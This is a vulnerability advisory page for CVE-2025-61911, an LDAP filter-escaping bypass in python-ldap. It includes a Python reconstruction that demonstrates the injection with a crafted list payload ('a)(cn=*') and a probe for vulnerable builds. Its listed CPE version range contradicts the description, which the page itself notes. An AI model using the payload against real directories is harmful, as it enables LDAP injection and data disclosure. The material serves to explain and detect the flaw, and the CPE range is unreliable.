CVE-2025-61911
BaseFortify

Publication date: 2025-10-10

Last updated on: 2025-12-04

Assigner: GitHub, Inc.

Description
python-ldap is a lightweight directory access protocol (LDAP) client API for Python. In versions prior to 3.4.5, the sanitization method `ldap.filter.escape_filter_chars` can be tricked into skipping the escaping of special characters when a crafted `list` or `dict` is supplied as the `assertion_value` parameter and the non-default `escape_mode=1` is configured. `ldap.filter.escape_filter_chars` supports three escaping modes. `escape_mode=0` (the default) and `escape_mode=2` happen to raise an exception when a `list` or `dict` object is supplied as `assertion_value`, so they fail closed. `escape_mode=1` does not: it iterates over the value and applies its per-character test to each element, and for a `list` or `dict` an element is a whole string rather than a single character, so the test does not guarantee a fully escaped return value. If an application relies on this method to escape untrusted user input, an attacker might be able to abuse the flaw to mount LDAP injection attacks that disclose or manipulate LDAP data meant to be inaccessible to them. Version 3.4.5 fixes the issue by adding a type check at the start of `ldap.filter.escape_filter_chars` that raises an exception when the supplied `assertion_value` is not of type `str`.
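The bypass and the fix, as an added example. The two `escape_model_*` functions below are a reconstruction of the behaviour the advisory describes for the three escape modes; they are not python-ldap's own source, and `build_uid_filter` and `probe` are hypothetical helpers written for this page. The attacker input is constructed.

```python
"""CVE-2025-61911: escape_mode=1 type-confusion bypass in
ldap.filter.escape_filter_chars (python-ldap < 3.4.5).

Added example. escape_model_vulnerable/escape_model_fixed reconstruct the
behaviour the advisory describes; they are not python-ldap's own source.
build_uid_filter and probe are hypothetical helpers.
"""
from typing import Any, Callable, Optional

# Characters that RFC 4515 requires to be escaped inside a filter value.
SPECIAL = "\\*()"


def escape_model_vulnerable(assertion_value: Any, escape_mode: int = 0) -> str:
    """Model of the pre-3.4.5 behaviour for all three escape modes."""
    if escape_mode == 0:
        # A chain of str.replace calls: a list or dict has no .replace,
        # so a non-str value raises AttributeError (fails closed).
        s = assertion_value.replace("\\", r"\5c")
        s = s.replace("*", r"\2a")
        s = s.replace("(", r"\28")
        s = s.replace(")", r"\29")
        return s.replace("\x00", r"\00")
    if escape_mode == 2:
        # Every element is hex-escaped; ord() on a multi-character
        # element raises TypeError (fails closed).
        return "".join("\\%02x" % ord(c) for c in assertion_value)
    if escape_mode == 1:
        out = []
        for c in assertion_value:
            # Correct when c is one character. When assertion_value is a
            # list (or a dict, which iterates over its keys), c is a whole
            # string: the ordering test is decided by its first character
            # and `in` becomes a substring test, so "a)(cn=*" passes untouched.
            if c < "0" or c > "z" or c in SPECIAL:
                c = "\\%02x" % ord(c)
            out.append(c)
        return "".join(out)
    raise ValueError("escape_mode must be 0, 1 or 2")


def escape_model_fixed(assertion_value: Any, escape_mode: int = 0) -> str:
    """3.4.5 behaviour as the advisory describes it: reject non-str first."""
    if not isinstance(assertion_value, str):
        raise TypeError(
            "assertion_value must be str, not %s" % type(assertion_value).__name__
        )
    return escape_model_vulnerable(assertion_value, escape_mode)


def build_uid_filter(escape: Callable[..., str], uid: Any) -> str:
    """Hypothetical application code: look a user up by uid with escape_mode=1.
    A list reaches it when, say, a JSON body or a repeated query parameter
    is passed straight through without a type check (assumed scenario)."""
    return "(&(objectClass=person)(uid=%s))" % escape(uid, escape_mode=1)


def probe(escape: Callable[..., str], value: Any, escape_mode: int = 1) -> Optional[str]:
    """Return the exception class name escape() raises for value, or None if
    it returned normally. Pointed at ldap.filter.escape_filter_chars on an
    installed python-ldap, None for a list with escape_mode=1 means the
    build lacks the 3.4.5 type check (assumed usage, not exercised here)."""
    try:
        escape(value, escape_mode=escape_mode)
    except Exception as exc:  # only the class name matters for the probe
        return type(exc).__name__
    return None


if __name__ == "__main__":
    payload = ["a)(cn=*"]  # constructed attacker input
    print("str input, mode 1 :", escape_model_vulnerable(payload[0], escape_mode=1))
    print("list input, mode 1:", escape_model_vulnerable(payload, escape_mode=1))
    print("filter built      :", build_uid_filter(escape_model_vulnerable, payload))
    for mode in (0, 1, 2):
        print("vulnerable mode %d:" % mode, probe(escape_model_vulnerable, payload, mode))
    print("fixed mode 1      :", probe(escape_model_fixed, payload, 1))
```

The same string passed as `str` comes back as `a\29\28cn=\2a`, but wrapped in a one-element list it comes back verbatim and the assembled filter becomes `(&(objectClass=person)(uid=a)(cn=*))`. To check an installed build rather than the model, call `probe(ldap.filter.escape_filter_chars, ["a)(cn=*"])` after `import ldap.filter`: a vulnerable version returns `None`, a fixed one returns `"TypeError"`.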
Meta Information
Generated: 2026-05-06
AI Q&A: 2025-10-11
EPSS Evaluated: 2026-05-05
Affected Vendors & Products
Showing 1 associated CPE
Vendor: python-ldap
Product: python-ldap
Version / Range: From 3.13.1 (inc) to 3.13.11 (inc)
Note: this CPE range does not agree with the description above, which names every python-ldap version prior to 3.4.5 as affected and 3.4.5 as the fixed release. When checking an installed version, go by the description.
CWE ID: Description
CWE-75: Failure to Sanitize Special Elements into a Different Plane (Special Element Injection). The product does not adequately filter user-controlled input for special elements with control implications.
CWE-843: Access of Resource Using Incompatible Type ('Type Confusion'). The product allocates or initializes a resource such as a pointer, object, or variable using one type, but it later accesses that resource using a type that is incompatible with the original type.
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability exists in the python-ldap library versions prior to 3.4.5, specifically in the ldap.filter.escape_filter_chars method when used with escape_mode=1. The method fails to properly escape special characters if a crafted list or dictionary is supplied as the assertion_value parameter, allowing an attacker to bypass sanitization. This can lead to LDAP injection attacks because the method does not adequately check the type of the input and does not fully escape the input, potentially allowing manipulation or disclosure of LDAP data.


How can this vulnerability impact me?

If your application uses the vulnerable python-ldap method to escape untrusted user input, an attacker could exploit this flaw to perform LDAP injection attacks. This could allow the attacker to access, disclose, or manipulate LDAP data that should be inaccessible, potentially compromising the integrity and confidentiality of your directory data.


What immediate steps should I take to mitigate this vulnerability?

Upgrade the python-ldap library to version 3.4.5 or later, which adds a type check to the ldap.filter.escape_filter_chars method so that non-string input is rejected instead of being partially escaped. Until the upgrade is applied, avoid using escape_mode=1 on untrusted input, and in your own code verify that any value handed to the escape function is a str, since a request parameter or JSON field can arrive as a list without the application noticing.

